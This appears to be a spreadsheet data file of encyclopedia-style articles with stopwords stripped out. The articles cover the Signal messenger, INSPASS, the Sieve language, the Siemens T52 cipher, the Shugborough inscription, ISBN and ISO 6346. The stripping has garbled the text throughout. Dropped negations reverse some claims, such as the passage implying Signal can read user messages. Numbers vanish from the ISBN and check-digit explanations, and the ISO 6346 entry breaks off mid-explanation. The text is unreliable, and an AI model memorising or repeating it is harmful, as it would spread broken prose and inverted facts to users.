minimalist data hygiene, situations contact adversary".signal excludes users' messages non-encrypted cloud backups default.signal allows users automatically blur faces people photos protect identities.signal also includes cryptocurrency wallet functionality allows users store, send receive in-app payments. apart certain regions countries, feature enabled globally november 2021. january 2022, supported payment method mobilecoin. limitations signal requires user provides phone number verification, eliminating need user names passwords facilitating contact discovery (see below). number device's card; also voip number landline long user receive verification code separate device software. number registered mobile device time. account registration requires android device.this mandatory connection phone number feature signal shares whatsapp, kakaotalk, others) criticized "major issue" privacy-conscious users comfortable giving private phone number. workaround secondary phone number. ability choose public, changeable username instead sharing one's phone number widely-requested feature.using phone numbers identifiers also create security risks arise possibility attacker taking phone number.when linking signal desktop mobile device, conversations history synced, messages shown signal desktop. usability july 2016, internet society published user study assessed ability signal users detect deter man-in-the-middle attacks. study concluded participants failed correctly compare public fingerprints order verify identity signal users, users believed succeeded, actually failed. four months later, signal's user interface updated make verifying identity signal users simpler. architecture encryption protocols signal messages encrypted signal protocol (formerly known textsecure protocol). protocol combines double ratchet algorithm, prekeys, extended triple diffie–hellman (x3dh) handshake. uses curve25519, aes-256, hmac-sha256 primitives. protocol provides confidentiality, integrity, authentication, participant consistency, destination validation, forward secrecy, backward secrecy (a.k.a. future secrecy), causality preservation, message unlinkability, message repudiation, participation repudiation, asynchronicity. provide anonymity preservation, requires servers relaying messages storing public material.the signal protocol also supports end-to-end encrypted group chats. group chat protocol combination pairwise double ratchet multicast encryption. addition properties provided one-to-one protocol, group chat protocol provides speaker consistency, out-of-order resilience, dropped message resilience, computational equality, trust equality, subgroup messaging, well contractible expandable membership.in october 2014, researchers ruhr university bochum published analysis signal protocol. among findings, presented unknown key-share attack protocol, general, found secure. october 2016, researchers uk's university oxford, queensland university technology australia, canada's mcmaster university published formal analysis protocol. they concluded protocol cryptographically sound. july 2017, researchers ruhr university bochum found another analysis group messengers purely theoretic attack group protocol signal: user knows secret group group (due group member previously stealing member's device) become member group. since group cannot guessed member changes displayed remaining members, attack likely difficult carry without detected.as august 2018, signal protocol implemented whatsapp, facebook messenger, skype, google allo, making possible conversations "more billion people worldwide" end-to-end encrypted. google allo, skype facebook messenger, conversations encrypted signal protocol default; offer end-to-end encryption optional mode.up march 2017, signal's voice calls encrypted srtp zrtp key-agreement protocol, developed phil zimmermann. march 2017, signal transitioned webrtc-based calling system introduced ability make video calls. signal's voice video calling functionalities signal protocol channel authentication instead zrtp. authentication verify correspondent really person claim signal users compare fingerprints scan codes) out-of-band. platform employs trust first mechanism order notify user correspondent's changes. local storage once messages received decrypted user's device, stored locally sqlite database encrypted sqlcipher. decrypt database also stored locally user's device accessed device unlocked. december 2020, cellebrite published blog post announcing products could access "decrypt signal app". technology reporters later published articles cellebrite claimed ability "break signal app" "crack signal's encryption". this latter interpretation rejected several experts, well representatives signal, said original post cellebrite accessing data unlocked android phone physical possession" "could opened look messages". similar extraction tools also exist devices signal desktop. servers signal relies centralized servers maintained signal messenger. addition routing signal's messages, servers also facilitate discovery contacts also registered signal users automatic exchange users' public keys. default, signal's voice video calls peer-to-peer. caller receiver's address book, call routed server order hide users' addresses. contact discovery servers store registered users' phone numbers, public material push tokens necessary setting calls transmitting messages. order determine contacts also signal users, cryptographic hashes user's contact numbers periodically transmitted server. server checks match sha256 hashes registered users tells client matches found. hashed numbers thereafter discarded server. 2014, moxie marlinspike wrote easy calculate possible hash inputs hash outputs reverse mapping limited preimage space (the possible hash inputs) phone numbers, "practical privacy preserving contact discovery remains unsolved problem." september 2017, signal's developers announced working signal client applications "efficiently scalably determine whether contacts address book signal users without revealing contacts address book signal service." metadata client-server communications protected tls. signal's developers asserted servers keep logs called when. june 2016, marlinspike told intercept "the closest piece information metadata signal server stores last time user connected server, precision information reduced day, rather hour, minute, second".the group messaging mechanism designed servers access membership list, group title, group icon. instead, creation, updating, joining, leaving groups done clients, deliver pairwise messages participants one-to-one messages delivered. federation signal's server architecture federated december 2013 february 2016. december 2013, announced messaging protocol signal uses successfully integrated android-based open-source operating system cyanogenmod. since cyanogenmod 11.0, client logic contained system called whisperpush. according signal's developers, cyanogen team signal messaging server whisperpush clients, federated main server, clients could exchange messages other. whisperpush source code available gplv3 license. february 2016, cyanogenmod team discontinued whisperpush recommended users switch signal. 2016, moxie marlinspike wrote federation cyanogenmod servers degraded user experience held back development, servers probably federate servers again.in 2016, moxie marlinspike requested third-party client called libresignal signal service signal name. result, 2016 libresignal project posted project "abandoned". functionality provided libresignal subsequently incorporated signal marlinspike. licensing complete source code signal clients android, desktop available github free software license. this enables interested parties examine code help developers verify everything behaving expected. also allows advanced users compile copies applications compare versions distributed signal messenger. march 2016, moxie marlinspike wrote that, apart shared libraries compiled project build lack gradle support, signal android reproducible. signal's servers partially open source, server software's anti-spam component proprietary closed source security concerns. reception security october 2014, electronic frontier foundation (eff) included signal updated surveillance self-defense guide. november 2014, signal received perfect score eff's secure messaging scorecard; received points communications encrypted transit, communications encrypted keys provider access (end-to-end encryption), making possible users independently verify correspondents' identities, past communications secure keys stolen (forward secrecy), code open independent review (open source), security designs well-documented, recent independent security audit. time, "chatsecure orbot", pidgin (with otr), silent phone, telegram's optional "secret chats" also received seven seven points scorecard.former contractor edward snowden endorsed signal multiple occasions. keynote speech sxsw march 2014, praised signal's predecessors (textsecure redphone) ease use. december 2014, spiegel leaked slides internal presentation dating june 2012 deemed signal's encrypted voice calling component (redphone) "major threat" mission accessing users' private data, used conjunction privacy tools cspace, tor, tails, truecrypt ranked "catastrophic" "near-total loss/lack insight target communications [and] presence".following 2016 democratic national committee email leak, reported vanity fair marc elias (the general counsel hillary clinton's presidential campaign) instructed staffers exclusively signal saying anything negative republican presidential nominee donald trump.in march 2017, signal approved sergeant arms u.s. senate senators staff.on september 2019, natalie silvanovich, security engineer working google's vulnerability research team project zero, disclosed android signal client could attacker user without knowledge. allowed attacker phone target device, mute call, call would complete keeping audio open without owner aware (however would still aware ring vibration initial call). fixed reported patched release 4.47.7 android.in february 2020, european commission recommended staff signal. following george floyd protests, began 2020, signal downloaded 121,000 times u.s. june. july 2020, signal became downloaded hong kong apple store google play store passage hong kong national security law.as january 2021, signal contact method securely providing tips major news outlets washington post, guardian, york times, wall street journal.candiru claims ability capture data signal private messenger spyware, €500.000.in march 2022, russian invasion ukraine, british ministry defence ordered troops switch whatsapp signal, favoured avoid soldiers' phones hacked russia.on august 2022, ismail sabri yaakob, prime minister malaysia, reported signal account "hacked" infiltrated third party, sending messages impersonating politician. details disclosed regarding method used gain access account. in-app payments april 2021, signal announced addition cryptocurrency wallet feature would allow users send receive payments mobilecoin. this received criticism security expert bruce schneier, previously praised software. schneier stated would bloat client attract unwanted attention authorities. wallet functionality initially available certain countries, later enabled globally november 2021. blocking december 2016, egypt blocked access signal. response, signal's developers added domain fronting service. this allows signal users specific country circumvent censorship making look like connecting different internet-based service. 2022, signal's domain fronting enabled default egypt, uae, oman, qatar, iran, cuba, uzbekistan ukraine.as january 2018, signal blocked iran. signal's domain fronting feature relies google engine (gae) service. this work iran google blocked iranian access order comply u.s. sanctions.in early 2018, google engine made internal change stop domain fronting countries. issue, signal made public change amazon cloudfront domain fronting. however, also announced would making changes service prevent domain fronting. result, signal said would start investigating methods/approaches. signal switched back google april 2019.in january 2021, iran removed stores, blocked signal. signal later blocked china march 2021. audience activists march 2021, united nations recommended myanmar residents signal protonmail pass preserve evidence human rights violations committed 2021 coup. controversial design, signal able read user messages confirmed independent audits signal's algorithms. signal's terms service also state product cannot used violate law. according former employee, signal's leadership time told would something people start abusing signal things think terrible". january 2021, position signal's leadership take "hands-off approach moderation" able read user messages "don't want media company".in 2016, authorities india arrested members suspected isis-affiliated terrorist cell communicated signal telegram.far right right-wing militias white nationalists used signal organizing actions including unite right rally 2018, charlottesville attack unite right rally 2017 killed injured 2022 reported dutch government officials adopted signal, sparking controversy. also comparison cross-platform instant messaging clients comparison voip software internet privacy list video telecommunication services product brands secure communication notes references bibliography external links official website signal twitter</t>
  </si>
  <si>
    <t>INSPASS</t>
  </si>
  <si>
    <t>inspass, passenger accelerated service system, program united states immigration naturalization service (ins) 1990s early 2000s purpose facilitate entry pre-screened low-risk travellers immigration customs certain airports. frequent travelers citizens u.s. handful trusted countries could apply inspass privileges. after background check, approved inspass members would register hand geometry biometric identifier presented associated membership card. upon entering united states arriving abroad, users would subject hand geometry scans would pass federal inspection without undergoing formal interview immigration inspectors. initial kiosk implementation, defined u.s. department justice, composed following elements: atm-like stand 80486 personal computer ms-windows running visual basic inch monitor/touch-screen 16-key keypad ocr-b card reader electronic gate lock trigger inch telpar receipt printer recognition systems, (rsi) 'handkey' hand geometry scannerthe program initially established international airport newark international airport 1993. later, expanded immigration customs pre-clearance inspection stations toronto vancouver, canada. although modeled dutch "schipholpass" program, inspass first large scale biometric identity verification program undertaken united states government quickly became largest biometric program world terms enrollments. development project initially piloted later deployed support john volpe national transportation systems center contractor computer data systems, inc. (cdsi). support program later taken electronic data systems (eds) 1995 awarded general support services contract u.s. department justice.program officials advocated concept "one traveler, card" promote harmonization system traveler biometric programs regular meetings held immigration authorities canada, united kingdom, germany, australia, netherlands achieve goal. pilots land border versions conducted buffalo, york world university games (summer 1993) later hidalgo, texas. eventually, total permanent inspass kiosks deployed following locations: york (jfk) terminals) newark toronto terminals) miami terminals) vancouver francisco angeles (lax) terminals)the program discontinued 2002. since replaced global entry, program u.s. customs border protection uses fingerprint biometrics enable frequent travelers bypass lines traditional immigration inspection lanes international airports. also biometrics portpass u.s. customs border protection references external links biometric consortium: passenger accelerated service system (inspass) january 1996 biometric consortium: inspass update government technology news: consideration inspass israel, august 2002 globalsecurity.org uspass (formerly inspass) global entry</t>
  </si>
  <si>
    <t>Sieve (mail filtering language)</t>
  </si>
  <si>
    <t>sieve programming language used email filtering. owes creation cyrus project, creators cyrus imap server. language tied particular operating system mail architecture. requires rfc-2822–compliant messages, otherwise generalize systems meet criteria. current version sieve's base specification outlined 5228, published january 2008. language sieve data-driven programming language, similar earlier email filtering languages procmail maildrop, earlier line-oriented languages awk: specifies conditions match actions take matching. this differs general-purpose programming languages highly limited base standard variables, loops (but allow conditional branching), preventing runaway programs limiting language simple filtering operations. although extensions devised extend language include variables and, limited degree, loops, language still highly restricted, thus suitable running user-devised programs part mail system. there also significant number restrictions grammar language, order reduce complexity parsing language, language also supports multiple methods comparing localized strings, fully unicode-aware. while sieve originally conceived tool external smtp, 5429 serendipitously extends order allow rejection smtp protocol level. sieve scripts generated gui-based rules editor entered directly using text editor. scripts transferred mail server server-dependent way. managesieve protocol (defined 5804) allows users manage sieve scripts remote server. mail servers local users allow scripts stored e.g. .sieve file users' home directories. history language standardized (now-obsolete) 3028 january 2001, showalter. extensions ietf sieve working group updated base specification 2008 (rfc 5228), brought following extensions proposed standard status: 5173 body; allows script test body message, header. 5229 variables; allows script save retrieve values variables. 5230 vacation; specifies action send response informing sender recipient away. 5231 relational tests; defines numeric tests, script test field numeric value, test number occurrences field. 5232 imap4flags; allows script test message's imap flags. 5233 subaddress; allows script test subaddresses form "user+detail@domain.example". 5235 spamtest virustest; allows script interface implementation-dependent message filtering. 5260 date index extensions. 5293 editheader; allows script delete message header fields. 5429 reject; allows messages rejected either lmtp/smtp level dsn. 5435 notifications; allows script trigger external notifications email. 5436 e-mail notifications; specifies notifications e-mail. 5437 xmpp notifications; specifies notifications xmpp. 5490 checking; mailbox status accessing mailbox metadata. 5703 mime part tests, iteration, extraction, replacement, enclosure 5804 protocol remotely managing sieve scriptsa number extensions still developed sieve working group. example this example sieve script: also email filtering procmail maildrop references external links sieve.info, wiki site sieve sieve home page web.archive.org 5228 (base specification sieve) sieve ietf working group charter sieve tutorial many examples</t>
  </si>
  <si>
    <t>Siemens and Halske T52</t>
  </si>
  <si>
    <t>siemens halske t52, also known geheimschreiber ("secret teleprinter"), schlüsselfernschreibmaschine (sfm), world german cipher machine teleprinter produced electrical engineering firm siemens halske. instrument traffic codenamed sturgeon british cryptanalysts. while enigma machine generally used field units, online machine used luftwaffe german navy units, could support heavy machine, teletypewriter attendant fixed circuits. fulfilled similar role lorenz cipher machines german army. british cryptanalysts bletchley park codenamed german teleprinter ciphers fish, individual cipher-systems given codenames: called sturgeon, lorenz machine codenamed tunny. operation teleprinters emitted character five parallel bits five lines, typically encoded baudot code something similar. pinwheels, stepped complex nonlinear way, based later models positions various relays past, could never stall. each five plaintext bits xored taps pinwheels, cyclically adjacent pairs plaintext bits swapped not, according sums three (different) output bits. numbers pins wheels coprime, triplets bits controlled swap selectable plugboard. this produced much complex cipher lorenz machine, also means pseudorandom number generator-and-xor cipher. example, cipher clerk erred sent different messages using exactly settings—a depth bletchley jargon—this could detected statistically immediately trivially solvable would lorenz. models siemens produced several mostly incompatible versions t52: t52a t52b, differed electrical noise suppression, t52c, t52d t52e. while t52a/b t52c cryptologically weak, last advanced devices; movement wheels intermittent, decision whether advance controlled logic circuits took input data wheels themselves. addition, number conceptual flaws, including subtle ones, eliminated. flaw ability reset keystream fixed point, reuse undisciplined machine operators. cryptanalysis following occupation denmark norway, germans started teleprinter circuit sweden. swedes immediately tapped line, 1940, mathematician cryptographer arne beurling cracked earliest models weeks, using paper feat later replicated bill tutte bletchley park lorenz teleprinter device used german high command). telephone company ericsson manufactured number analogue machines could decode messages settings found hand. swedes read traffic system three years, berlin oslo, also germany german forces finland, course german embassy stockholm. total, swedes intercepted 500,000 german messages decrypted 350,000. however, poor security meant germans eventually became aware this. improvement security 1942 defeated swedes. however, second upgrade mid-1943 not, flow decrypted messages came end.the british first detected traffic summer autumn 1942 link sicily libya, codenamed "sturgeon", another aegean sicily, codenamed "mackerel". operators links habit enciphering several messages machine settings, producing large numbers depths. these depths analysed michael crum.the british bletchley park later also broke sturgeon, although break regularly broke enigma tunny. this partly complex cipher three, also luftwaffe often retransmitted sturgeon messages using easier-to-attack already broken) ciphers, making unnecessary attack sturgeon. also sigaba (united states) typex (britain) siemens references citations sources donald davies, siemens halske t52e cipher machine (reprinted cryptology: yesterday, today tomorrow, artech house, norwood, 1987) donald davies, early models siemens halske cipher machine (also reprinted cryptology: yesterday, today tomorrow) donald davies, information history siemens halske cipher machines (reprinted selections cryptologia: history, people, technology, artech house, norwood, 1998) external links john savard's page geheimfernschreiber photographs sturgeon entry "sturgeon" gc&amp;cs cryptographic dictionary bletchley park's sturgeon, fish laid eggs rutherford journal.</t>
  </si>
  <si>
    <t>Shugborough inscription</t>
  </si>
  <si>
    <t>shugborough inscription sequence letters letters carved 18th-century shepherd's monument grounds shugborough hall staffordshire, england, mirror image nicolas poussin's painting shepherds arcadia. never satisfactorily explained, called world's uncracked ciphertexts.in 1982, authors pseudohistorical holy blood holy grail suggested poussin member priory sion, shepherds arcadia contained hidden meanings great esoteric significance. book makes passing reference shepherd's monument inscription, offers solution. 2003, brown copied many elements holy blood holy grail bestselling novel vinci code, made mention shugborough inscription. however, book renewed interest holy blood holy grail. 2004, richard kemp, general manager shugborough estate, launched promotional campaign bletchley park museum former bletchley park employees shiela lawn oliver lawn. promotion event included repeated references idea could connection monument holy grail, based brief reference made monument pseudohistorical holy blood holy grail. despite fact organisers event favoured theories, conclusive answer emerged. monument monument, commissioned thomas anson, built sometime 1748 1756. outer form monument portico featuring doric columns. these support entablature decorated frieze comprising three metopes depicting laurel wreaths, containing carvings stone heads. head shows smiling bald-headed man; bears likeness goat-horned greek pan. entablature topped antefix using anthemion design. inside portico rusticated arch, frames relief fashioned flemish sculptor peter scheemakers. relief copy poussin painting arcadia shows woman three men, pointing tomb. tomb carved latin text arcadia also arcadia" even arcadia"). carving displays number small alterations original painting, including addition extra sarcophagus placed main tomb. below relief stone plaque displaying ten-letter inscription. inscription broken lines. there eight letters first line, second line, placed either letters first line. letters second line, commonly used roman tombs stand manibus, meaning "dedicated shades". theories recent decades, investigators proposed several possible solutions. despite many theories, staff shugborough hall remain sceptical proposed solutions. spokesman property (now owned national trust) quoted 2014 asserting, five people week believe solved code wary now." latin initialism theories suggestion eight letters coded dedication george anson deceased wife. 1951 oliver stonor speculated letters might initialism latin phrase optimae uxoris optimae sororis viduus amantissimus vovit virtutibus ("best wives, best sisters, devoted widower dedicates (this) virtues"). this solution favoured former bletchley park employee shiela lawn. pointed out, however, grammar sentence incorrect, abbreviations following latin rules cannot expanded arbitrarily. steve regimbal interprets letters standing latin translation phrase "vanity vanities, saith preacher; vanity." (ecclesiastes 12:8), namely orator omnia sunt vanitas vanitas vanitatum. speculated phrase source earlier inscription "omnia vanitas" carved alcove estate thomas anson's associates, george lyttleton. former linguist keith massey interprets letters initialism latin phrase omnes sequantur viam veram vitam pray follow true life") reference biblical verse john 14:6, veritas vita way, truth life"). cypher theories dave ramsden (2014) suggests monument understood funerary altar, dedicated syncretic female figure known "shepherdess". interprets eight-letter inscription polyalphabetic cipher used encrypt name "magdalen". george edmunds book anson's gold (2016) proposed cypher encoding latitude longitude island admiral george anson, thomas anson's brother, buried spanish treasure. anson mounted secret expedition recover treasure, located unforeseen circumstances remains place. according edmunds, anson received letters code sent expedition leader include part cipher. english initialism theories margaret, countess lichfield (1899–1988) suggested monument built admiral anson memorial wife. thought inscription referred poem related story shepherdess, alicia, lived hills rome helped convert pagans christianity. theory, initialism referring lines your sweet vale, alicia, vanishes vanity. twixt deity thou, shepherdess, way, source words ever traced. morton observes letters match names residents shugborough early 19th century, believes inscription denotes words orgreave united overley shugborough, viscount anson venables vernon. references external links bletchley veterans tackle 'toughest puzzle yet' (the guardian) vinci code shugborough hall (bbc) holy grail 'clue' stately home (the times)</t>
  </si>
  <si>
    <t>ISBN</t>
  </si>
  <si>
    <t>international standard book number (isbn) numeric commercial book identifier intended unique. publishers purchase isbns affiliate international isbn agency.an isbn assigned separate edition variation (except reprintings) publication. example, e-book, paperback hardcover edition book different isbn. isbn digits long assigned 2007, thirteen digits long assigned january 2007. method assigning isbn nation-specific varies countries, often depending large publishing industry within country. initial isbn identification format devised 1967, based upon 9-digit standard book numbering (sbn) created 1966. 10-digit isbn format developed international organization standardization (iso) published 1970 international standard 2108 (the 9-digit code converted 10-digit isbn prefixing zero digit '0'). privately published books sometimes appear without isbn. international isbn agency sometimes assigns books isbns initiative.another identifier, international standard serial number (issn), identifies periodical publications magazines newspapers. international standard music number (ismn) covers musical scores. history standard book number (sbn) commercial system using nine-digit code numbers identify books. 1965, british bookseller stationers whsmith announced plans implement standard numbering system books. they hired consultants work behalf, system devised gordon foster, emeritus professor statistics trinity college dublin. international organization standardization (iso) technical committee documentation sought adapt british international use. isbn identification format conceived 1967 united kingdom david whitaker (regarded "father isbn") 1968 united states emery koltay (who later became director u.s. isbn agency bowker).the 10-digit isbn format developed published 1970 international standard 2108. united kingdom continued nine-digit code 1974. appointed international isbn agency registration authority isbn worldwide isbn standard developed control technical committee 46/subcommittee 46/sc on-line facility refers back 1978.an converted isbn prefixing digit "0". example, second edition reeder returns, published hodder 1965, "sbn 01381 "340" indicates publisher, "01381" serial number assigned publisher, check digit. prefixing zero, converted isbn 0-340-01381-8; check digit need re-calculated. some publishers, ballantine books, would sometimes 12-digit sbns last three digits indicated price book; example, woodstock handmade houses 12-digit standard book number 345-24223-8-595 (valid sbn: 345-24223-8, isbn: 0-345-24223-8), cost us$5.95.since january 2007, isbns contained thirteen digits, format compatible "bookland" european article numbers, digits. overview separate isbn assigned edition variation (except reprintings) publication. example, ebook, audiobook, paperback, hardcover edition book different isbn assigned it.: isbn thirteen digits long assigned january 2007, digits long assigned 2007. international standard book number consists four parts 10-digit isbn) five parts (for 13-digit isbn). section international isbn agency's official user manual: describes structure 13-digit isbn, follows: 13-digit isbn, prefix element prefix: made available gs1, registration group element (language-sharing country group, individual country territory), registrant element, publication element, checksum character check digit.a 13-digit isbn separated parts (prefix element, registration group, registrant, publication check digit), done customary separate parts hyphens spaces. separating parts (registration group, registrant, publication check digit) 10-digit isbn also done either hyphens spaces. figuring correctly separate given isbn complicated, parts fixed number digits. issuing process isbn issuance country-specific, isbns issued isbn registration agency responsible country territory regardless publication language. ranges isbns assigned particular country based publishing profile country concerned, ranges vary depending number books number, type, size publishers active. some isbn registration agencies based national libraries within ministries culture thus receive direct funding government support services. cases, isbn registration service provided organisations bibliographic data providers government funded.a full directory isbn agencies available international isbn agency website. list countries given below: australia thorpe-bowker brazil national library brazil; february 2020) brazil câmara brasileira livro (from march 2020) canada english library archives canada, government agency; french bibliothèque archives nationales québec; colombia cámara colombiana libro, hong kong books registration office (bro), hong kong public libraries india raja rammohun national agency isbn (book promotion copyright division), department higher education, constituent ministry human resource development iceland landsbókasafn (national university library iceland) israel israel center libraries italy ediser srl, owned associazione italiana editori (italian publishers association) maldives national bureau classification (nbc) malta national book council (maltese: il-kunsill nazzjonali tal-ktieb) morocco national library morocco zealand national library zealand nigeria national library nigeria pakistan national library pakistan philippines national library philippines south africa national library south africa spain spanish isbn agency agencia isbn turkey general directorate libraries publications, branch ministry culture united kingdom republic ireland nielsen book services ltd, part nielsen holdings n.v. united states bowker registration group element isbn registration group element 1-to-5-digit number valid within single prefix element (i.e. 979),: separated hyphens, "978-1-...". registration groups primarily allocated within prefix element. single-digit registration groups within 978-prefix element are: english-speaking countries; french-speaking countries; german-speaking countries; japan; russian-speaking countries; people's republic china. example 5-digit registration group 99936, bhutan. allocated registration groups are: 0–5, 600–625, 80–94, 950–989, 9917–9989, 99901–99983. books published rare languages typically longer group elements.within prefix element, registration group reserved compatibility international standard music numbers (ismns), material actually assigned isbn. registration groups within prefix element assigned united states america, france, republic korea, italy.the original 9-digit standard book number (sbn) registration group identifier, prefixing zero 9-digit creates valid 10-digit isbn. registrant element national isbn agency assigns registrant element (cf. category:isbn agencies) accompanying series isbns within registrant element publisher; publisher allocates isbns books. countries, book publisher legally required assign isbn, although large bookstores handle publications isbns assigned them.a listing 900,000 assigned publisher codes published, ordered book form. website isbn agency offer free method looking publisher codes. partial lists compiled (from library catalogs) english-language groups: identifier identifier publishers receive blocks isbns, larger blocks allotted publishers expecting need them; small publisher receive isbns digits registration group identifier, several digits registrant, single digit publication element. once block isbns used, publisher receive another block isbns, different registrant element. consequently, publisher different allotted registrant elements. there also registration group identifier used country. this might occur registrant elements particular registration group allocated publishers. using variable block lengths, registration agencies able customise allocations isbns make publishers. example, large publisher given block isbns fewer digits allocated registrant element many digits allocated publication element; likewise, countries publishing many titles allocated digits registration group identifier many registrant publication elements. here sample isbn-10 codes, illustrating block length variations. english language pattern english-language registration group elements registration group elements). these registration group elements divided registrant elements systematic pattern, allows length determined, follows: check digits check digit form redundancy check used error detection, decimal equivalent binary check bit. consists single digit computed digits number. method 10-digit isbn extension sbns, systems compatible; prefixed zero (the 10-digit isbn) give check digit without zero. check digit base eleven, integer 'x'. system 13-digit isbns compatible sbns will, general, give different check digit corresponding 10-digit isbn, provide protection transposition. this 13-digit code required compatible format, hence could contain 'x'. isbn-10 check digits according 2001 edition international isbn agency's official user manual, isbn-10 check digit (which last digit 10-digit isbn) must range (the symbol used 10), must digits, multiplied (integer) weight, descending multiple that digit, must chosen that: example, isbn-10 0-306-40615-2: formally, using modular arithmetic, rendered also true isbn-10s digits, multiplied weight ascending order multiple example: formally, rendered common errors handling isbn (e.g. typing writing down) single altered digit transposition adjacent digits. proven mathematically pairs valid isbn-10s differ least digits. also proven pairs valid isbn-10s eight identical digits transposed digits. (these proofs true isbn less eleven digits long prime number.) isbn check digit method therefore ensures always possible detect common types error, i.e., either types error occurred, result never valid isbn digits multiplied weights never multiple however, error occur publishing house remain undetected, book would issued invalid isbn.in contrast, possible types error, altered non-transposed digits, three altered digits, result valid isbn (although still unlikely). isbn-10 check digit calculation each first nine digits 10-digit isbn—excluding check digit itself—is multiplied (integer) weight, descending nine products found. value check digit simply number which, added sum, means total multiple example, check digit isbn-10 0-306-40615-? calculated follows: adding gives multiple (because 12×11) number therefore, check digit complete sequence isbn 0-306-40615-2. value {\displaystyle x_{10}} required satisfy condition used. alternatively, modular arithmetic convenient calculating check digit using modulus remainder divided (i.e. value modulo 11), computed. this remainder plus check digit must equal either therefore, check digit minus remainder products modulo modulo taking remainder modulo second time accounts possibility first remainder without second modulo operation, calculation could result check digit value invalid. (strictly speaking, first "modulo needed, considered simplify calculation.) example, check digit isbn-10 0-306-40615-? calculated follows: thus check digit possible avoid multiplications software implementation using accumulators. repeatedly adding computes necessary multiples: modular reduction done end, shown case could hold value large 496, invalid isbn 99999-999-9-x), could reduced conditional subtract addition. isbn-13 check digit calculation appendix international isbn agency's official user manual: describes 13-digit isbn check digit calculated. isbn-13 check digit, last digit isbn, must range must thirteen digits, multiplied (integer) weight, alternating multiple isbn-13 subset ean-13, algorithm calculating check digit exactly both. formally, using modular arithmetic, rendered: calculation isbn-13 check digit begins first twelve digits 13-digit isbn (thus excluding check digit itself). each digit, left right, alternately multiplied products summed modulo give value ranging subtracted leaves result zero replaces ten, cases, single check digit results. example, isbn-13 check digit 978-0-306-40615-? calculated follows: remainder thus, check digit complete sequence isbn 978-0-306-40615-7. general, isbn-13 check digit calculated follows. then this check system similar check digit formula catch errors adjacent digit transposition. specifically, difference adjacent digits check digit catch transposition. instance, example allows situation followed correct order contributes sum; while, digits transposed followed contribution digits however, congruent modulo produce same, final result: isbns check digit isbn-10 formula uses prime modulus avoids blind spot, requires digits express check digit. additionally, 2nd, 4th, 6th, 8th, 10th, 12th digits tripled added remaining digits (1st, 3rd, 5th, 7th, 9th, 11th, 13th), total always divisible (i.e., isbn-10 isbn-13 conversion isbn-10 converted isbn-13 prepending "978" isbn-10 recalculating final checksum digit using isbn-13 algorithm. reverse process also performed, numbers commencing prefix 978, 10-digit equivalent. errors usage publishers libraries varied policies isbn check digit. publishers sometimes fail check correspondence book title isbn publishing failure causes book identification problems libraries, booksellers, readers. example, isbn 0-590-76484-5 shared books ninja gaiden: novel based best-selling game tecmo (1990) wacky laws (1997), published scholastic. most libraries booksellers display book record invalid isbn issued publisher. library congress catalogue contains books published invalid isbns, usually tags phrase "cancelled isbn". however, book-ordering systems search book invalid isbn entered search engine. oclc often indexes invalid isbns, book indexed member library. eisbn only term "isbn" used; terms "eisbn" "e-isbn" historically sources confusion avoided. book exists digital (e-book) formats, formats must isbn. words, three separate epub, amazon kindle, formats particular book specific isbn. they share isbn paper version, generic "eisbn" encompasses e-book formats title. format used barcodes, upgrading currently barcodes book's back cover inside mass-market paperback book's front cover) ean-13; separate barcode encoding five digits called ean-5 currency recommended retail price. 10-digit isbns, number "978", bookland "country code", prefixed isbn barcode data, check digit recalculated according ean-13 formula (modulo weighting alternating digits). partly expected shortage certain isbn categories, international organization standardization (iso) decided migrate 13-digit isbn (isbn-13). process began january 2005 planned conclude january 2007. 2011, 13-digit isbns began 978. isbn supply exhausted, prefix introduced. part prefix reserved musicland code musical scores ismn. 10-digit ismn codes differed visually began letter; code represents zero, checksum purposes counted ismns thirteen digits commencing 979-0; 979-1 979-9 used isbn. publisher identification code numbers unlikely isbns, likewise, guarantee language area code numbers same. moreover, 10-digit isbn check digit generally 13-digit isbn check digit. because gtin-13 part global trade item number (gtin) system (that includes gtin-14, gtin-12, gtin-8), 13-digit isbn falls within 14-digit data field range.barcode format compatibility maintained, (aside group breaks) isbn-13 barcode format identical barcode format existing 10-digit isbns. migration ean-based system allows booksellers single numbering system books non-book products compatible existing isbn based data, minimal changes information technology systems. hence, many booksellers (e.g., barnes noble) migrated barcodes early march 2005. although many american canadian booksellers able read ean-13 barcodes 2005, general retailers could read them. upgrading barcode system full ean-13, 2005, eased migration isbn-13 north america. also asin (amazon standard identification number) bici (book item component identifier) coden (serial publication identifier currently used libraries; replaced issn works) (digital object identifier) estc (english short title catalogue) isan (international standard audiovisual number) ismn (international standard music number) isrc (international standard recording code) issn (international standard serial number) istc (international standard text code) iswc (international standard musical work code) iswn (international standard wine number) lccn (library congress control number) lebanese isbn agency license number (east german books) (book identification system used 1951 1990 former gdr) list group-0 isbn publisher codes list group-1 isbn publisher codes list isbn identifier groups oclc number (online computer library center number) registration authority sici (serial item contribution identifier) (verzeichnis deutschen sprachbereich erschienenen drucke jahrhunderts, "bibliography books printed german speaking countries sixteenth century") (verzeichnis deutschen sprachraum erschienenen drucke jahrhunderts, "bibliography books printed german speaking countries seventeenth century") explanatory notes references external links 2108:2017 international standard book number (isbn) international isbn agency—coordinates supervises worldwide isbn system numerical list group identifiers—list language/region prefixes free conversion tool: isbn-10 isbn-13 isbn-13 isbn-10 isbn agency. also shows correct hyphenation verifies isbns valid not. "guidelines implementation 13-digit isbns" (pdf). archived original (pdf) september 2004 3187—using international standard book numbers uniform resource names (urn) book sources search—allows search isbn</t>
  </si>
  <si>
    <t>ISO 6346</t>
  </si>
  <si>
    <t>6346 international standard covering coding, identification marking intermodal (shipping) containers used within containerized intermodal freight transport international organization standardization (iso). standard establishes visual identification system every container includes unique serial number (with check digit), owner, country code, size, type equipment category well operational marks. register container owners managed international container bureau (bic). identification system example 6346 compliant container number: illustrated example code container owned hapag-lloyd owner code owner code consists three capital letters latin alphabet indicate owner principal operator container. such code needs registered bureau international conteneurs paris ensure uniqueness worldwide. owner apply code, normally first letters used owner code third used indicate pool (e.g. hla, hlb, hapag-lloyd codes indicate whether container standard, reefer...) equipment category identifier equipment category identifier consists following capital letters latin alphabet: freight containers detachable freight container-related equipment trailers chassispresently, official container codes "u". however, association american railroads recognizes similar codes containers trailers travelling rail north america, however recognized lack check digits. under code, then, use. refrigerated (reefer) container identified means size type code. serial number serial number consists numeric digits, assigned owner operator, uniquely identifying container within owner/operator's fleet. check digit check digit consists numeric digit providing means validating recording transmission accuracy owner code serial number. compute check digit, letters converted numbers. this done three steps: calculation step equivalent numerical value assigned letter alphabet, beginning letter multiples thereof omitted): individual digits serial number keep numeric value. calculation step each numbers calculated step multiplied 2position, position exponent base position starts left right. following table shows multiplication factors: 